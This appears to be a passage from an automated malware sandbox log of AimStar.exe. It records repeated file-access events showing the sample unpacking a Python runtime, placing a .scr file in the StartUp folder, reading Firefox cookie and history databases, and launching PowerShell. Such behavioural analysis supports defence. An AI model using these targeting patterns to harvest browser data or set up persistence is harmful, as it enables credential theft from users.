Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
